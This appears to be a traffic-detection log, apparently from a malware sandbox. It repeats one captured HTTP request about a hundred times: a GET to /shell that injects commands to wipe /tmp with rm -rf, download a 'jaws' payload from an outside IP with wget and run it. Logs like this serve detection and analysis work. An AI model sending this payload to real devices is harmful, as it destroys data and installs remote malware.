              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
